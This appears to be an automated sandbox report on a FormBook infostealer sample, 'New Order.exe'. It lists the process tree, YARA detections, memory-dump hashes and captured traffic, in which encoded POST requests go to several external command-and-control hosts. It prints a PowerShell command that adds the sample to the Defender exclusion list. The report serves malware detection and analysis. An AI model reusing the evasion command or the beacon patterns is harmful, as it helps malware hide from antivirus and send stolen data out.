                                                                                                                            Date: Tue, 03 Dec 2024 13:41:03 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            37 | 192.168.2.6 | 50052 | 173.236.199.97 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 3, 2024 14:41:09.982424974 CET | 791 | OUT | POST /z5bv/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.kvsj.net
                                                                                                                            Referer: http://www.kvsj.net/z5bv/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=RtCC5tLJ+S1ZDi7N6qz7nwnItkKduQSCk2AKxBDdxZJZ2x6uwJ+FFt3vet+5s5M2dJWizNJjEYWkUc9UCZsq0I9/6wx86m6hMZKQukgvQRhJZx7nc96acQI4bhHUU8J8giugRad29+yUCwUSesoB7fNxQWxPzX4ZbueoYTOXuLOXtTffzxgcNMgGvBONnkgRFOufy+f6RYEO
                                                                                                                            Dec 3, 2024 14:41:11.114233971 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:10 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                             Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 50053 | 173.236.199.97 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:41:12.654444933 CET | 815 | OUT | POST /z5bv/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.kvsj.net
                                                                                                                            Referer: http://www.kvsj.net/z5bv/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=RtCC5tLJ+S1ZACrN4Jb7gQnJpUKdgASOk2cKxE7NyrdZ2TSuxI+FCt3vRN+2xJMhdJKEzJJjEbqkUYtUFuAt1Y99vgx++m6hMZKQuk0VQQJJZCzndZOdRwI7chHUDMJ4giuWRYpM98KUCyMSe9oG0fN7UWw83XV3d8XXYi2u0pqVhFCFvCg/fcAEvDW/nEg7HOWfgpTdeshtOJTJerWb3lpdXyPlTMk5sA==
Dec 3, 2024 14:41:13.841635942 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:13 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                             Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 50054 | 173.236.199.97 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:41:15.328624010 CET | 1828 | OUT | POST /z5bv/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.kvsj.net
                                                                                                                            Referer: http://www.kvsj.net/z5bv/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                             Data Ascii: u6nP_F48= [TRUNCATED]
Dec 3, 2024 14:41:16.415549994 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:16 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                             Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 50055 | 173.236.199.97 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:41:17.994131088 CET | 548 | OUT | GET /z5bv/?u6nP_F48=cvqi6aS93HIxTV+im7Da9wWvrF3f6kX831gUtjTv5ZY+kxOTwbTgT7fbXvvVwY5eJbST1YhYPLKkRqd0ELEj3LZc91hb0mGUNuPi7mwbOhhaZQnJVaKvflcbWzyST/JxwAq3b9E=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:41:19.131710052 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:18 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                             Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 50056 | 85.159.66.93 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:41:25.386986017 CET | 812 | OUT | POST /8l49/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.beythome.online
                                                                                                                            Referer: http://www.beythome.online/8l49/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=qt078Az7Ir899rmT9dc23vG3VUnxjG0tjdIG4wy1ckw2giJsbudvJVIIS1dsqRyYw3M5QemrdRxpRFpO0b1WoBtuQOiUOnNI/yy5819EQ63KS4ts22N1Kd3RMEcFWB6fLo3CeGyg8uVS31V4uBY9En8w49jQ3yF3hESB2MgFawGvnxk9hnY0owlzGoaURW+jZ2pkNa7a8byg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 50057 | 85.159.66.93 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:41:28.051297903 CET | 836 | OUT | POST /8l49/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.beythome.online
                                                                                                                            Referer: http://www.beythome.online/8l49/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=qt078Az7Ir899KWT/8c2mfG0Z0nx221qjaAG4xmlcWk2jH1sJ85vF1IIcVdTkxyHw3BEQfardRlpRAtO1oNVqRtsfuiSAHNI/yy5815iQ6vKSrlssS5yJd3Wb0cFHR6bLo3seHuK8stS3wp4uV0+On8pntjB/D98hCXj1tgEECafmH5n9UYX6gFxGqCmR2+Jb2RkfN39zvXD/8gVgSz87TnxV1GK6yiYtQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 50058 | 85.159.66.93 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:41:30.717328072 CET | 1849 | OUT | POST /8l49/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.beythome.online
                                                                                                                            Referer: http://www.beythome.online/8l49/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                             Data Ascii: u6nP_F48= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 50059 | 85.159.66.93 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:41:33.384145021 CET | 555 | OUT | GET /8l49/?u6nP_F48=nvcb/0GPN54d2JGc++8p3dyReVT22F4rjpMi4BWXcGVVoAh+NvljRHAQbHtQixLLlmtkfcmDaBBvdXdVxLFdqzx8TquVI3FC1FmB8VJ2JKjVM5x76R9HEtDUYFAgHCOmYLPQQCg=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Timestamp:Dec 3, 2024 14:41:34.704046011 CET
                                                                                                                            Bytes transferred:225
                                                                                                                            Direction:IN
                                                                                                                            Data:
                                                                                                                            HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.14.1
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:34 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                            X-Rate-Limit-Reset: 2024-12-03T13:41:39.4849300Z


                                                                                                                            Session ID:45
                                                                                                                            Source IP:192.168.2.6
                                                                                                                            Source Port:50060
                                                                                                                            Destination IP:154.70.82.246
                                                                                                                            Destination Port:80
                                                                                                                            PID:5868
                                                                                                                            Process:C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Timestamp:Dec 3, 2024 14:41:49.508117914 CET
                                                                                                                            Bytes transferred:824
                                                                                                                            Direction:OUT
                                                                                                                            Data:
                                                                                                                            POST /j7q9/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.conseilnsaftogo.org
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.conseilnsaftogo.org
                                                                                                                            Referer: http://www.conseilnsaftogo.org/j7q9/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=KTRPO0XvpZcljqvTMKWkHW6H/a3E1B7b8W94X/Lw3Wb7fL+THcBQlwVgfvmHznqvTZp7MjU+7IMC3nZJ3EEYuO6Sta8mRB8x9wT7gYIWIzrcusSiMOIg0RiJMe88InmhMP9nKa9DCNbHZdYULKTAVDKY1hHsMdhkNg4ezbMdrRcvkFQplucQaILAC9n0NDDqCyWZR6RHiIlF


                                                                                                                            Session ID:46
                                                                                                                            Source IP:192.168.2.6
                                                                                                                            Source Port:50061
                                                                                                                            Destination IP:154.70.82.246
                                                                                                                            Destination Port:80
                                                                                                                            Timestamp:Dec 3, 2024 14:41:53.030522108 CET
                                                                                                                            Bytes transferred:848
                                                                                                                            Direction:OUT
                                                                                                                            Data:
                                                                                                                            POST /j7q9/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.conseilnsaftogo.org
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.conseilnsaftogo.org
                                                                                                                            Referer: http://www.conseilnsaftogo.org/j7q9/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=KTRPO0XvpZcliJ3TLsekG26Ew63E7h6S8Wx4X6673l/7fuaTVNBQmwVgXPnN9HrjTZldMhw+7IoC3ilJ21Ef/O6Qi68eJh8x9wT7gZooIzzcuciiPvIjqBiIPe88C3mlMP9JKfllCPTHZcoUKfnDfDKe2RGTHcUaUgkZ/bI70hYrhzNz5dczIYrCC//GNjDAAyuZDtdgt8AmjsGL+dWkwSrtPgffluxEGg==
                                                                                                                            Timestamp:Dec 3, 2024 14:41:55.487888098 CET
                                                                                                                            Bytes transferred:1236
                                                                                                                            Direction:IN
                                                                                                                            Data:
                                                                                                                            HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:55 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                            Link: <https://conseilnsaftogo.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                            Data Ascii: 3f0a<!DOCTYPE html><html lang="en-US"><head><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta charset="UTF-8" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://conseilnsaftogo.org/xmlrpc.php"><meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.8 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - NSAF - TOGO</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - NSAF - TOGO" /><meta property="og:site_name" content="NSAF - TOGO" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://conseilnsaftogo.org/


                                                                                                                            Target ID:1
                                                                                                                            Start time:08:37:43
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\New Order.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0xb20000
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5 hash:8EF36959A2CEDC10C4C6036C2360E105
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0xea0000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\New Order.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0x430000
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5 hash:8EF36959A2CEDC10C4C6036C2360E105
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\New Order.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0xcc0000
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5 hash:8EF36959A2CEDC10C4C6036C2360E105
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:13
                                                                                                                            Start time:08:38:08
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe"
                                                                                                                            Imagebase:0x750000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:14
                                                                                                                            Start time:08:38:10
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\w32tm.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\SysWOW64\w32tm.exe"
                                                                                                                            Imagebase:0xbf0000
                                                                                                                            File size:92'672 bytes
                                                                                                                            MD5 hash:E55B6A057FDDD35A7380FB2C6811A8EC
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:17
                                                                                                                            Start time:08:38:23
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe"
                                                                                                                            Imagebase:0x750000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:19
                                                                                                                            Start time:08:38:37
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                            File size:676'768 bytes
                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true


                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.7%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:5.2%
                                                                                                                              Total number of Nodes:286
                                                                                                                              Total number of Limit Nodes:17
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1fde746ab99c207fd5264ba37a4bcba24670fce374a733e32a332c79cd05b60
                                                                                                                              • Instruction ID: c19bfa21ef4c3daf7d25681aa04b051736e4a80f5ff31312d4bcb99b29848305
                                                                                                                              • Opcode Fuzzy Hash: e1fde746ab99c207fd5264ba37a4bcba24670fce374a733e32a332c79cd05b60
                                                                                                                              • Instruction Fuzzy Hash: E9425C70E102198FEB98DFA8C85079EBFF2AF88300F1495A9D509AB345DB749D41CF95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
